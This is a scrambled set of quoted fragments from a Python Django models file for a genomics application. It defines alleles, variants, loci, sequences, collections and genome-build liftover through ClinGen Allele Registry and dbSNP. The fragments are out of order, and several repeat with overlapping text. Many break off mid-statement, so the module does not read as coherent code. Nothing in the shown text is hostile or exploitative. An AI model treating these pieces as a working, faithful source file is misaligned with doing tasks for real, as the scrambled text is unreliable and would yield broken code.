"coordinates during liftover. Can be slow (API call) If you know a VariantAllele",
"self.variant_for_build(genome_build=GenomeBuild.grch38(), best_attempt=False) except ValueError: return None @lazy def variants(self): return Variant.objects.filter(pk__in=self.variant_alleles().values_list('variant', flat=True)) def",
"to store Alleles for a small fraction of Variants So don't want them",
"any_at_all def get_canonical_c_hgvs(self, genome_build): c_hgvs = None if cta := self.get_canonical_transcript_annotation(genome_build): c_hgvs =",
"user = models.ForeignKey(User, on_delete=CASCADE) allele_source = models.ForeignKey(AlleleSource, on_delete=CASCADE) conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices) source_vcf",
"models.OneToOneField(ClinGenAllele, null=True, on_delete=CASCADE) def get_absolute_url(self): # will show allele if there is one,",
"models.ForeignKey(Sequence, on_delete=CASCADE) class Meta: unique_together = (\"locus\", \"alt\") @staticmethod def get_chrom_q(chrom): return Q(locus__contig__name__iexact=chrom)",
"InheritanceManager from flags.models import FlagCollection, flag_collection_extra_info_signal, FlagInfos from flags.models.models import FlagsMixin, FlagTypeContext from",
"rights). Django 3 has ExclusionConstraint, Postgres contrib has BtreeGistExtension to add via migration",
"return name def __format__(self, format_spec: str): if format_spec == 'CA' and (cligen_allele :=",
"independent - ie GRCh37 and GRCh38 variants for same change point to same",
"Allele Registry, but sometimes that can fail. Linked against Variant with VariantAllele below",
"return self.locus.contig.name, self.locus.position, self.locus.ref.seq, self.alt.seq def is_abbreviated(self): return str(self) != self.full_string @lazy def",
"be slow (API call) If you know a VariantAllele exists for your build,",
"-> Optional['Variant']: try: return self.variant_for_build(genome_build=GenomeBuild.grch38(), best_attempt=False) except ValueError: return None @lazy def variants(self):",
"ExclusionConstraint, Postgres contrib has BtreeGistExtension to add via migration \"\"\" seq = models.TextField()",
"conversion_tool=conversion_tool, success=can_merge, message=merge_log_message) if can_merge: if other_clingen_allele: # Move across ClinGen Allele (may",
"in other_allele.variantallele_set.all(): try: va.allele = self va.conversion_tool = conversion_tool va.save() except IntegrityError: logging.warning(\"VariantAllele",
"can't have another, so it'll work) other_allele.clingen_allele = None other_allele.save() self.clingen_allele = other_clingen_allele",
"liftover_complete: v37 = self.variant_alleles().filter(genome_build=GenomeBuild.grch37()).first() v38 = self.variant_alleles().filter(genome_build=GenomeBuild.grch38()).first() if v37: self.close_open_flags_of_type(allele_flag_types.missing_37) else: self.flag_collection_safe.get_or_create_open_flag_of_type(flag_type=allele_flag_types.missing_37, only_if_new=True)",
"Liftover pipeline involves reading through a VCF where ID is set to Allele.pk",
"= models.ForeignKey(User, on_delete=CASCADE) allele_source = models.ForeignKey(AlleleSource, on_delete=CASCADE) conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices) source_vcf =",
"position, ref, alt) \"\"\" variant_tuple = None if m := regex_pattern.match(variant_string): chrom, position,",
"canonical=True).first() def get_best_variant_transcript_annotation(self, genome_build) -> Optional['VariantTranscriptAnnotation']: vav = genome_build.latest_variant_annotation_version if can := self.varianttranscriptannotation_set.filter(version=vav,",
"on_delete=CASCADE) def get_absolute_url(self): # will show allele if there is one, otherwise go",
"to same allele This is generally done via ClinGen Allele Registry, but sometimes",
"write the VCF in the desired genome build For others (NCBI Remap) we",
"def get_chrom_q(chrom): return Q(locus__contig__name__iexact=chrom) | Q(locus__contig__ucsc_name__iexact=chrom) @staticmethod def get_contigs_q(genome_build: GenomeBuild): \"\"\" Restrict to",
"return Variant.objects.filter(variantallele__allele=allele) def get_canonical_transcript_annotation(self, genome_build) -> Optional['VariantTranscriptAnnotation']: vav = genome_build.latest_variant_annotation_version return self.varianttranscriptannotation_set.filter(version=vav, canonical=True).first()",
"models.ForeignKey(User, on_delete=CASCADE) allele_source = models.ForeignKey(AlleleSource, on_delete=CASCADE) conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices) source_vcf = models.TextField(null=True)",
"contig__locus__variant=self) return {gbc.genome_build for gbc in gbc_qs} @lazy def coordinate(self) -> VariantCoordinate: locus",
"django.contrib.auth.models import User from django.db import models, IntegrityError from django.db.models import Value as",
"snpdb.models import Wiki from snpdb.models.flag_types import allele_flag_types from snpdb.models.models_clingen_allele import ClinGenAllele from snpdb.models.models_enums",
"a VCF file (multiple Variants with different alt alleles point to the same",
"f\"{self.chrom}:{self.position} {self.ref}\" class Variant(models.Model): \"\"\" Variants represent the different alleles at a locus",
"def full_string(self): \"\"\" No abbreviation \"\"\" return self.format_tuple(*self.as_tuple()) def __str__(self): return self.format_tuple(self.locus.contig.name, self.locus.position,",
":= self.varianttranscriptannotation_set.filter(version=vav).first(): return version if any_at_all := self.varianttranscriptannotation_set.first(): return any_at_all def get_canonical_c_hgvs(self, genome_build):",
"genome_build: GenomeBuild) -> 'Variant': params = [\"locus__contig__name\", \"locus__position\", \"locus__ref__seq\", \"alt__seq\"] return Variant.objects.get(locus__contig__genomebuildcontig__genome_build=genome_build, **dict(zip(params,",
"Sequence.abbreviate(alt) return f\"{chrom}:{position} {ref}>{alt}\" @staticmethod def get_tuple_from_string(variant_string: str, genome_build: GenomeBuild, regex_pattern: Pattern[str] =",
"Greatest from django.db.models.functions.text import Concat from django.db.models.query_utils import Q, FilteredRelation from django.dispatch import",
"Variant.get_tuple_from_string(variant_string, genome_build, regex_pattern=regex_pattern) try: return Variant.get_from_tuple(variant_tuple, genome_build) except Variant.DoesNotExist: return None @staticmethod def",
"in all builds, but at least one # links there, and can't have",
"on_delete=CASCADE, related_name=\"liftover_source_genome_build\") genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE) # destination def get_allele_source(self) -> AlleleSource: \"\"\"",
"\"\"\" Keep track of calls to Allele.merge() \"\"\" old_allele = models.ForeignKey(Allele, related_name=\"old_allele_merge\", on_delete=CASCADE)",
"raise ValueError(\"Allele contains no VariantAlleles at all! Cannot liftover\") dbsnp = DbSNP.get_for_variant(va.variant, va.genome_build.latest_variant_annotation_version)",
"False does not check for missing representations \"\"\" if liftover_complete: v37 = self.variant_alleles().filter(genome_build=GenomeBuild.grch37()).first()",
"sender=FlagCollection) def get_extra_info(flag_infos: FlagInfos, user: User, **kwargs): # pylint: disable=unused-argument alleles = Allele.objects.filter(flag_collection__in=flag_infos.ids)",
"# destination def get_allele_source(self) -> AlleleSource: \"\"\" Returns subclass instance \"\"\" return AlleleSource.objects.get_subclass(pk=self.allele_source_id)",
"vas.first() if va: return va.variant raise ValueError(f'Could not find any variants in allele",
"genome_build.chrom_contig_mappings[chrom] variant_tuple = VariantCoordinate(contig.name, int(position), ref, alt) return variant_tuple @staticmethod def get_from_string(variant_string: str,",
"a genome build \"\"\" return Q(locus__contig__genomebuildcontig__genome_build=genome_build) @staticmethod def get_no_reference_q(): return ~Q(alt__seq=Variant.REFERENCE_ALT) @staticmethod def",
"genome_build.latest_variant_annotation_version return self.varianttranscriptannotation_set.filter(version=vav, canonical=True).first() def get_best_variant_transcript_annotation(self, genome_build) -> Optional['VariantTranscriptAnnotation']: vav = genome_build.latest_variant_annotation_version if",
"self.close_open_flags_of_type(allele_flag_types.missing_38) else: self.flag_collection_safe.get_or_create_open_flag_of_type(flag_type=allele_flag_types.missing_38, only_if_new=True) allele_validate_signal.send(sender=Allele, allele=self) @receiver(flag_collection_extra_info_signal, sender=FlagCollection) def get_extra_info(flag_infos: FlagInfos, user: User,",
"@property def end(self): return self.locus.position + max(self.locus.ref.length, self.alt.length) @staticmethod def clean_variant_fields(chrom, position, ref,",
"related_name=\"liftover_source_genome_build\") genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE) # destination def get_allele_source(self) -> AlleleSource: \"\"\" Returns",
"was done via VariantAlleleSource \"\"\" allele_sources_qs = VariantAlleleSource.objects.filter(variant_allele__allele=allele) return Liftover.objects.filter(allele_source__in=allele_sources_qs, genome_build=genome_build).first() class VariantAlleleCollectionSource(AlleleSource):",
"AlleleMergeLog.objects.create(old_allele=other_allele, new_allele=self, conversion_tool=conversion_tool, success=can_merge, message=merge_log_message) if can_merge: if other_clingen_allele: # Move across ClinGen",
"allele_flag_types from snpdb.models.models_clingen_allele import ClinGenAllele from snpdb.models.models_enums import AlleleConversionTool, AlleleOrigin, ProcessingStatus from snpdb.models.models_genome",
"TextField from django.db.models.functions import Greatest from django.db.models.functions.text import Concat from django.db.models.query_utils import Q,",
"GenomeBuild, regex_pattern=VARIANT_PATTERN) -> Optional['Variant']: variant_tuple = Variant.get_tuple_from_string(variant_string, genome_build, regex_pattern=regex_pattern) try: return Variant.get_from_tuple(variant_tuple, genome_build)",
"vav = genome_build.latest_variant_annotation_version return self.varianttranscriptannotation_set.filter(version=vav, canonical=True).first() def get_best_variant_transcript_annotation(self, genome_build) -> Optional['VariantTranscriptAnnotation']: vav =",
"can have unique constraints) Postgres by default uses indexes for constraints, and large",
"share contigs (eg GRCh37/38 share MT and some unplaced scaffolds) - in those",
"choices=AlleleConversionTool.choices) error = models.JSONField(null=True) # Only set on error class Meta: unique_together =",
"maximum size is 8191\" The easiest solution is to md5sum seq and make",
"@staticmethod def get_no_reference_q(): return ~Q(alt__seq=Variant.REFERENCE_ALT) @staticmethod def get_overlap_annotate_and_q(contig, start, end): \"\"\" Query handling",
"def get_genome_build(self): return None def get_variants_qs(self): return Variant.objects.none() def get_allele_qs(self): return Allele.objects.filter(variantallele__variant__in=self.get_variants_qs()) def",
"the different alleles at a locus Usually 2+ per line in a VCF",
"except ValueError: return None @lazy def variants(self): return Variant.objects.filter(pk__in=self.variant_alleles().values_list('variant', flat=True)) def variant_for_build(self, genome_build:",
"want_chr) return chrom, position, ref, alt class VariantWiki(Wiki): variant = models.OneToOneField(Variant, on_delete=CASCADE) class",
"g_hgvs is None: if settings.LIFTOVER_DBSNP_ENABLED: va = self.variantallele_set.all().first() if va is None: raise",
"None @staticmethod def get_from_tuple(variant_tuple: VariantCoordinate, genome_build: GenomeBuild) -> 'Variant': params = [\"locus__contig__name\", \"locus__position\",",
"= r\"^([^:]+):(\\d+)$\" VARIANT_PATTERN = re.compile(r\"^([^:]+):(\\d+)[,\\s]*([GATC]+)>(=|[GATC]+)$\", re.IGNORECASE) allele_validate_signal = django.dispatch.Signal(providing_args=[\"allele\"]) class Allele(FlagsMixin, models.Model): \"\"\"",
"def complete(self): self.get_allele_source().liftover_complete(genome_build=self.genome_build) def __str__(self): source = \"\" if self.source_genome_build: source = f\"from",
"to have 4 groups, returns (chrom, position, ref, alt) \"\"\" variant_tuple = None",
"share MT and some unplaced scaffolds) - in those cases # we'll have",
"on_delete=CASCADE) variant_allele = models.ForeignKey(VariantAllele, on_delete=CASCADE) class Liftover(TimeStampedModel): \"\"\" Liftover pipeline involves reading through",
"= models.ForeignKey(Sequence, on_delete=CASCADE) class Meta: unique_together = (\"contig\", \"position\", \"ref\") @property def chrom(self):",
"None: if self.error: # Retry if server was down return self.error.get(\"errorType\") == ClinGenAllele.CLINGEN_ALLELE_SERVER_ERROR_TYPE",
"and self.clingen_allele: can_merge = False merge_log_message = f\"Error performing {merge_log_message}: both have ClinGen",
"FlagsMixin, FlagTypeContext from library.django_utils.django_partition import RelatedModelsPartitionModel from library.genomics import format_chrom from library.utils import",
"have 4 groups, returns (chrom, position, ref, alt) \"\"\" variant_tuple = None if",
"'.' @property def is_reference(self) -> bool: return self.alt.seq == self.REFERENCE_ALT @property def is_standard_variant(self)",
"merge(self, conversion_tool, other_allele: \"Allele\") -> bool: \"\"\" Merge other_allele into this allele \"\"\"",
"make the constraint on that. Another possible solution is to use Gist indexes",
"regex_pattern - has to have 4 groups, returns (chrom, position, ref, alt) \"\"\"",
"them on the Variant object - instead do 1-to-1 \"\"\" # Some builds",
"# Check if the other build shares existing contig genome_build_contigs = set(c.pk for",
"handled via drop partition variant = models.ForeignKey(Variant, on_delete=CASCADE) class AlleleSource(models.Model): \"\"\" Provides a",
"the build being used by ClinGen) - but it's not likely. It's a",
"in a query \"\"\" kwargs = {name: Concat(f\"{path_to_variant}locus__contig__name\", V(\":\"), f\"{path_to_variant}locus__position\", V(\" \"), f\"{path_to_variant}locus__ref__seq\",",
"max_length: s = f\"{s[:3]}...{s[-3:]}\" return s def __str__(self): return self.abbreviate(self.seq) @staticmethod def get_pk_by_seq(q=None):",
"desired genome build For others (NCBI Remap) we need to write the source",
"F from django.db.models.deletion import CASCADE, DO_NOTHING from django.db.models.fields import TextField from django.db.models.functions import",
"other_allele: \"Allele\") -> bool: \"\"\" Merge other_allele into this allele \"\"\" if self",
"is_standard_variant(self) -> bool: \"\"\" Variant alt sequence is standard [GATCN] (ie not special",
"v37: self.close_open_flags_of_type(allele_flag_types.missing_37) else: self.flag_collection_safe.get_or_create_open_flag_of_type(flag_type=allele_flag_types.missing_37, only_if_new=True) if v38: self.close_open_flags_of_type(allele_flag_types.missing_38) else: self.flag_collection_safe.get_or_create_open_flag_of_type(flag_type=allele_flag_types.missing_38, only_if_new=True) allele_validate_signal.send(sender=Allele, allele=self)",
"= self.variantallele_set.all().first() if va is None: raise ValueError(\"Allele contains no VariantAlleles at all!",
"f\"{s[:3]}...{s[-3:]}\" return s def __str__(self): return self.abbreviate(self.seq) @staticmethod def get_pk_by_seq(q=None): qs = Sequence.objects.all()",
"from django.db.models import Value as V, QuerySet, F from django.db.models.deletion import CASCADE, DO_NOTHING",
"VariantCoordinate(chrom=contig.name, pos=locus.position, ref=locus.ref.seq, alt=self.alt.seq) @staticmethod def is_ref_alt_reference(ref, alt): return ref == alt or",
"variant_tuple @staticmethod def get_from_string(variant_string: str, genome_build: GenomeBuild, regex_pattern=VARIANT_PATTERN) -> Optional['Variant']: variant_tuple = Variant.get_tuple_from_string(variant_string,",
"ref, alt = m.groups() chrom, position, ref, alt = Variant.clean_variant_fields(chrom, position, ref, alt,",
"= AlleleConversionTool.CLINGEN_ALLELE_REGISTRY except ValueError: # Various contig errors all subclass from this pass",
"def is_abbreviated(self): return str(self) != self.full_string @lazy def full_string(self): \"\"\" No abbreviation \"\"\"",
"by ClinGen) - but it's not likely. It's a bug to have the",
"flat=True) class VariantAlleleCollectionRecord(models.Model): collection = models.ForeignKey(VariantAlleleCollectionSource, on_delete=CASCADE) variant_allele = models.ForeignKey(VariantAllele, on_delete=CASCADE) class Liftover(TimeStampedModel):",
"is generally done via ClinGen Allele Registry, but sometimes that can fail. Linked",
"Move across ClinGen Allele (may not have been possible to retrieve in all",
"alleles at a locus Usually 2+ per line in a VCF file (ref",
"va is None: raise ValueError(\"Allele contains no VariantAlleles at all! Cannot liftover\") dbsnp",
"query \"\"\" kwargs = {name: Concat(f\"{path_to_variant}locus__contig__name\", V(\":\"), f\"{path_to_variant}locus__position\", V(\" \"), f\"{path_to_variant}locus__ref__seq\", V(\">\"), f\"{path_to_variant}alt__seq\",",
"models.CharField(max_length=1, choices=ProcessingStatus.choices, default=ProcessingStatus.CREATED) @property def variant_collection_alias(self): return f\"variantcollection_{self.pk}\" def get_annotation_kwargs(self): vcr_condition = Q(variantcollectionrecord__variant_collection=self)",
"to guarantee seq is unique (so Locus/Variant can have unique constraints) Postgres by",
"and then creating VariantAllele entries for the variant/allele Some AlleleConversionTools (eg ClinGen AlleleRegistry)",
"VariantCollection(RelatedModelsPartitionModel): \"\"\" A set of variants - usually used as a cached result",
"= models.OneToOneField(Variant, on_delete=CASCADE) class VariantAllele(TimeStampedModel): \"\"\" It's possible for multiple variants from the",
"the source genome build VCF first Alleles must have already been created -",
"models.CharField(max_length=2, choices=AlleleConversionTool.choices) source_vcf = models.TextField(null=True) source_genome_build = models.ForeignKey(GenomeBuild, null=True, on_delete=CASCADE, related_name=\"liftover_source_genome_build\") genome_build =",
"-> bool: \"\"\" Merge other_allele into this allele \"\"\" if self == other_allele:",
"Cannot liftover\") dbsnp = DbSNP.get_for_variant(va.variant, va.genome_build.latest_variant_annotation_version) if dbsnp: g_hgvs = dbsnp.get_g_hgvs(genome_build, alt=va.variant.alt) conversion_tool",
"a \"1:123321 G>C\" style string in a query \"\"\" kwargs = {name: Concat(f\"{path_to_variant}locus__contig__name\",",
"\"\"\" # Some builds share contigs (eg GRCh37/38 share MT and some unplaced",
"in the desired genome build For others (NCBI Remap) we need to write",
"class VariantCollectionRecord(models.Model): variant_collection = models.ForeignKey(VariantCollection, on_delete=DO_NOTHING) # handled via drop partition variant =",
"return dict(qs.values_list(\"seq\", \"pk\")) def is_standard_sequence(self): \"\"\" only contains G/A/T/C/N \"\"\" return not re.match(r\"[^GATCN]\",",
"end_position__gte=start) return annotation_kwargs, q @staticmethod def annotate_variant_string(qs, name=\"variant_string\", path_to_variant=\"\"): \"\"\" Return a \"1:123321",
"django.conf import settings from django.contrib.auth.models import User from django.db import models, IntegrityError from",
"bool: return self.alt.seq != Variant.REFERENCE_ALT and self.locus.ref.length < self.alt.length @property def is_deletion(self) ->",
"\"\"\" return AlleleSource.objects.get_subclass(pk=self.allele_source_id) def get_allele_qs(self) -> QuerySet: return self.get_allele_source().get_allele_qs() def complete(self): self.get_allele_source().liftover_complete(genome_build=self.genome_build) def",
"this pass if g_hgvs is None: if settings.LIFTOVER_DBSNP_ENABLED: va = self.variantallele_set.all().first() if va",
"uses indexes for constraints, and large TextFields give error of: \"index row requires",
"variants(self): return Variant.objects.filter(pk__in=self.variant_alleles().values_list('variant', flat=True)) def variant_for_build(self, genome_build: GenomeBuild, best_attempt=True) -> 'Variant': vas =",
"from library.utils import md5sum_str from snpdb.models import Wiki from snpdb.models.flag_types import allele_flag_types from",
"variant = models.ForeignKey(Variant, on_delete=CASCADE) genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE) allele = models.ForeignKey(Allele, on_delete=CASCADE) origin",
"entries for the variant/allele Some AlleleConversionTools (eg ClinGen AlleleRegistry) we can write the",
"1 Variant for a given locus/alt per database (handled via insertion queues) \"\"\"",
"clean_variant_fields(chrom, position, ref, alt, want_chr): ref = ref.strip().upper() alt = alt.strip().upper() if Variant.is_ref_alt_reference(ref,",
"resolve to the same allele (due to our normalization not being the same",
"variant_collection = models.ForeignKey(VariantCollection, on_delete=DO_NOTHING) # handled via drop partition variant = models.ForeignKey(Variant, on_delete=CASCADE)",
"{self.get_conversion_tool_display()}\" class LiftoverError(models.Model): liftover = models.ForeignKey(Liftover, on_delete=CASCADE) allele = models.ForeignKey(Allele, on_delete=CASCADE) variant =",
"return AlleleSource.objects.get_subclass(pk=self.allele_source_id) def get_allele_qs(self) -> QuerySet: return self.get_allele_source().get_allele_qs() def complete(self): self.get_allele_source().liftover_complete(genome_build=self.genome_build) def __str__(self):",
"= genome_build.latest_variant_annotation_version return self.varianttranscriptannotation_set.filter(version=vav, canonical=True).first() def get_best_variant_transcript_annotation(self, genome_build) -> Optional['VariantTranscriptAnnotation']: vav = genome_build.latest_variant_annotation_version",
"f\"Allele {self.pk}\" def validate(self, liftover_complete=True): \"\"\" :param liftover_complete: If False does not check",
"database (handled via insertion queues) \"\"\" contig = models.ForeignKey(Contig, on_delete=CASCADE) position = models.IntegerField(db_index=True)",
"the VCF in the desired genome build For others (NCBI Remap) we need",
"position, ref, alt = Variant.clean_variant_fields(chrom, position, ref, alt, want_chr=genome_build.reference_fasta_has_chr) contig = genome_build.chrom_contig_mappings[chrom] variant_tuple",
"def needs_clingen_call(self): if settings.CLINGEN_ALLELE_REGISTRY_LOGIN and self.allele.clingen_allele is None: if self.error: # Retry if",
"via {self.get_conversion_tool_display()}\" class LiftoverError(models.Model): liftover = models.ForeignKey(Liftover, on_delete=CASCADE) allele = models.ForeignKey(Allele, on_delete=CASCADE) variant",
"@property def is_standard_variant(self) -> bool: \"\"\" Variant alt sequence is standard [GATCN] (ie",
"contig errors all subclass from this pass if g_hgvs is None: if settings.LIFTOVER_DBSNP_ENABLED:",
"Genome build independent - ie GRCh37 and GRCh38 variants for same change point",
"get_canonical_transcript_annotation(self, genome_build) -> Optional['VariantTranscriptAnnotation']: vav = genome_build.latest_variant_annotation_version return self.varianttranscriptannotation_set.filter(version=vav, canonical=True).first() def get_best_variant_transcript_annotation(self, genome_build)",
"from library.genomics import format_chrom from library.utils import md5sum_str from snpdb.models import Wiki from",
"AlleleConversionTool.CLINGEN_ALLELE_REGISTRY except ValueError: # Various contig errors all subclass from this pass if",
"-> bool: \"\"\" Variant alt sequence is standard [GATCN] (ie not special or",
"self.locus contig = locus.contig return VariantCoordinate(chrom=contig.name, pos=locus.position, ref=locus.ref.seq, alt=self.alt.seq) @staticmethod def is_ref_alt_reference(ref, alt):",
"bool: \"\"\" Merge other_allele into this allele \"\"\" if self == other_allele: raise",
"at the end of a liftover pipeline (once per build) \"\"\" pass class",
"= f\"{s[:3]}...{s[-3:]}\" return s def __str__(self): return self.abbreviate(self.seq) @staticmethod def get_pk_by_seq(q=None): qs =",
"Variant.objects.none() def get_allele_qs(self): return Allele.objects.filter(variantallele__variant__in=self.get_variants_qs()) def liftover_complete(self, genome_build: GenomeBuild): \"\"\" This is called",
"locus = self.locus contig = locus.contig return VariantCoordinate(chrom=contig.name, pos=locus.position, ref=locus.ref.seq, alt=self.alt.seq) @staticmethod def",
"= None if g_hgvs: variant_tuple = get_hgvs_variant_tuple(g_hgvs, genome_build) return conversion_tool, variant_tuple def merge(self,",
"@lazy def allele(self) -> Optional[Allele]: va = VariantAllele.objects.filter(variant=self).first() if va: return va.allele return",
"self.variantallele_set.all().first() if va is None: raise ValueError(\"Allele contains no VariantAlleles at all! Cannot",
"source_object=allele) class AlleleMergeLog(TimeStampedModel): \"\"\" Keep track of calls to Allele.merge() \"\"\" old_allele =",
"complete(self): self.get_allele_source().liftover_complete(genome_build=self.genome_build) def __str__(self): source = \"\" if self.source_genome_build: source = f\"from {self.source_genome_build.name}",
"other_clingen_allele: # Move across ClinGen Allele (may not have been possible to retrieve",
"not find a variant in allele {self.id} for build {genome_build}') if not va:",
"a cached result \"\"\" RECORDS_BASE_TABLE_NAMES = [\"snpdb_variantcollectionrecord\"] RECORDS_FK_FIELD_TO_THIS_MODEL = \"variant_collection_id\" PARTITION_LABEL_TEXT = \"variant_collection\"",
"write the source genome build VCF first Alleles must have already been created",
"source_vcf = models.TextField(null=True) source_genome_build = models.ForeignKey(GenomeBuild, null=True, on_delete=CASCADE, related_name=\"liftover_source_genome_build\") genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE)",
"reference) \"\"\" # locus.ref should always be standard... return self.alt.is_standard_sequence() @property def is_indel(self)",
"Optional[Allele]: va = VariantAllele.objects.filter(variant=self).first() if va: return va.allele return None @property def equivalent_variants(self)",
"alt = Sequence.abbreviate(alt) return f\"{chrom}:{position} {ref}>{alt}\" @staticmethod def get_tuple_from_string(variant_string: str, genome_build: GenomeBuild, regex_pattern:",
"Provides a source of alleles for liftover pipelines. \"\"\" objects = InheritanceManager() def",
"Variant with VariantAllele below \"\"\" clingen_allele = models.OneToOneField(ClinGenAllele, null=True, on_delete=CASCADE) def get_absolute_url(self): #",
"return annotation_kwargs, q @staticmethod def annotate_variant_string(qs, name=\"variant_string\", path_to_variant=\"\"): \"\"\" Return a \"1:123321 G>C\"",
"= other_clingen_allele self.save() if other_fc := other_allele.flag_collection: other_fc.flag_set.update(collection=self.flag_collection_safe) other_fc.flagwatch_set.update(flag_collection=self.flag_collection) existing_fc_cc_names = self.flag_collection.clinicalcontext_set.values_list(\"name\", flat=True)",
"variant_tuple = get_hgvs_variant_tuple(g_hgvs, genome_build) return conversion_tool, variant_tuple def merge(self, conversion_tool, other_allele: \"Allele\") ->",
"django_extensions.db.models import TimeStampedModel from lazy import lazy from model_utils.managers import InheritanceManager from flags.models",
"(eg GRCh37/38 share MT and some unplaced scaffolds) - in those cases #",
"Q(locus__contig__name__iexact=chrom) | Q(locus__contig__ucsc_name__iexact=chrom) @staticmethod def get_contigs_q(genome_build: GenomeBuild): \"\"\" Restrict to contigs in a",
"Variant.REFERENCE_ALT and self.locus.ref.length < self.alt.length @property def is_deletion(self) -> bool: return self.alt.seq !=",
"(\"contig\", \"position\", \"ref\") @property def chrom(self): return self.contig.name def __str__(self): return f\"{self.chrom}:{self.position} {self.ref}\"",
"or 2 loci in a genome build being represented by 1 loci in",
"{gbc.genome_build for gbc in gbc_qs} @lazy def coordinate(self) -> VariantCoordinate: locus = self.locus",
"same as ClinGen or 2 loci in a genome build being represented by",
"alt.strip().upper() if Variant.is_ref_alt_reference(ref, alt): alt = Variant.REFERENCE_ALT chrom = format_chrom(chrom, want_chr) return chrom,",
"was down return self.error.get(\"errorType\") == ClinGenAllele.CLINGEN_ALLELE_SERVER_ERROR_TYPE return True return False def __str__(self): return",
"get_q(self): if self.status != ProcessingStatus.SUCCESS: raise ValueError(f\"{self}: status {self.get_status_display()} != SUCCESS\") return Q(**{f\"{self.variant_collection_alias}__isnull\":",
"locus__position__lte=end, end_position__gte=start) return annotation_kwargs, q @staticmethod def annotate_variant_string(qs, name=\"variant_string\", path_to_variant=\"\"): \"\"\" Return a",
"int = 20): if len(s) > max_length: s = f\"{s[:3]}...{s[-3:]}\" return s def",
"conversion_tool, variant_tuple conversion_tool = None g_hgvs = None if self.clingen_allele: try: g_hgvs =",
"kwargs = {name: Concat(f\"{path_to_variant}locus__contig__name\", V(\":\"), f\"{path_to_variant}locus__position\", V(\" \"), f\"{path_to_variant}locus__ref__seq\", V(\">\"), f\"{path_to_variant}alt__seq\", output_field=TextField())} return",
"class Meta: unique_together = (\"contig\", \"position\", \"ref\") @property def chrom(self): return self.contig.name def",
"SUCCESS\") return Q(**{f\"{self.variant_collection_alias}__isnull\": False}) def __str__(self): return f\"VariantCollection: {self.pk} ({self.name})\" class VariantCollectionRecord(models.Model): variant_collection",
"= Variant.REFERENCE_ALT chrom = format_chrom(chrom, want_chr) return chrom, position, ref, alt class VariantWiki(Wiki):",
"handling indels. Contigs must match and variant.start <= end AND variant.end_position >= start",
"None if cta := self.get_canonical_transcript_annotation(genome_build): c_hgvs = cta.hgvs_c return c_hgvs @property def start(self):",
"been created - allele_source used to retrieve them The VCF (in genome_build build)",
"'chrom pos ref alt') class Sequence(models.Model): \"\"\" We want to guarantee seq is",
"allele This is generally done via ClinGen Allele Registry, but sometimes that can",
"being the same as ClinGen or 2 loci in a genome build being",
"use variant_for_build(genome_build).as_tuple() \"\"\" from snpdb.models.models_dbsnp import DbSNP from genes.hgvs import get_hgvs_variant_tuple # Check",
"return self.format_tuple(*self.as_tuple()) def __str__(self): return self.format_tuple(self.locus.contig.name, self.locus.position, self.locus.ref, self.alt) def get_absolute_url(self): # will",
"variant/allele Some AlleleConversionTools (eg ClinGen AlleleRegistry) we can write the VCF in the",
"have the same variant linked through different VariantAlleles (so it can't be 1-to-1)",
"\"\"\" Only works if liftover was done via VariantAlleleSource \"\"\" allele_sources_qs = VariantAlleleSource.objects.filter(variant_allele__allele=allele)",
"contains G/A/T/C/N \"\"\" return not re.match(r\"[^GATCN]\", self.seq) class Locus(models.Model): \"\"\" 1 per line",
"database (handled via insertion queues) \"\"\" REFERENCE_ALT = \"=\" locus = models.ForeignKey(Locus, on_delete=CASCADE)",
"self.locus.ref.length != self.alt.length @property def is_insertion(self) -> bool: return self.alt.seq != Variant.REFERENCE_ALT and",
"normalization not being the same as ClinGen or 2 loci in a genome",
"alt alleles point to the same locus) There is only 1 Locus for",
"error = None if va := self.variantallele_set.filter(error__isnull=False).first(): error = va.error return error def",
"Variant.REFERENCE_ALT chrom = format_chrom(chrom, want_chr) return chrom, position, ref, alt class VariantWiki(Wiki): variant",
"= models.TextField(null=True) source_genome_build = models.ForeignKey(GenomeBuild, null=True, on_delete=CASCADE, related_name=\"liftover_source_genome_build\") genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE) #",
"self.full_string @lazy def full_string(self): \"\"\" No abbreviation \"\"\" return self.format_tuple(*self.as_tuple()) def __str__(self): return",
"Variant.objects.filter(variantallele__in=self.get_variant_allele_ids()) def get_variant_allele_ids(self): return self.variantallelecollectionrecord_set.values_list(\"variant_allele\", flat=True) class VariantAlleleCollectionRecord(models.Model): collection = models.ForeignKey(VariantAlleleCollectionSource, on_delete=CASCADE) variant_allele",
"want_chr=genome_build.reference_fasta_has_chr) contig = genome_build.chrom_contig_mappings[chrom] variant_tuple = VariantCoordinate(contig.name, int(position), ref, alt) return variant_tuple @staticmethod",
"get_genome_build(self): return None def get_variants_qs(self): return Variant.objects.none() def get_allele_qs(self): return Allele.objects.filter(variantallele__variant__in=self.get_variants_qs()) def liftover_complete(self,",
"return None def get_variants_qs(self): return Variant.objects.none() def get_allele_qs(self): return Allele.objects.filter(variantallele__variant__in=self.get_variants_qs()) def liftover_complete(self, genome_build:",
"= models.IntegerField(db_index=True) ref = models.ForeignKey(Sequence, on_delete=CASCADE) class Meta: unique_together = (\"contig\", \"position\", \"ref\")",
"__format__(self, format_spec: str): if format_spec == 'CA' and (cligen_allele := self.clingen_allele): return str(cligen_allele)",
"the same 3 variant/build/allele so we can add that unique_together constraint We only",
"self.status != ProcessingStatus.SUCCESS: raise ValueError(f\"{self}: status {self.get_status_display()} != SUCCESS\") return Q(**{f\"{self.variant_collection_alias}__isnull\": False}) def",
"None: raise ValueError(\"Allele contains no VariantAlleles at all! Cannot liftover\") dbsnp = DbSNP.get_for_variant(va.variant,",
"VCF first Alleles must have already been created - allele_source used to retrieve",
"been possible to retrieve in all builds, but at least one # links",
"unique_together = (\"variant\", \"genome_build\", \"allele\") @property def canonical_c_hgvs(self): return self.variant.get_canonical_c_hgvs(self.genome_build) def needs_clingen_call(self): if",
"-> Optional['Liftover']: \"\"\" Only works if liftover was done via VariantAlleleSource \"\"\" allele_sources_qs",
"write VCF coordinates during liftover. Can be slow (API call) If you know",
"(handled via insertion queues) \"\"\" contig = models.ForeignKey(Contig, on_delete=CASCADE) position = models.IntegerField(db_index=True) ref",
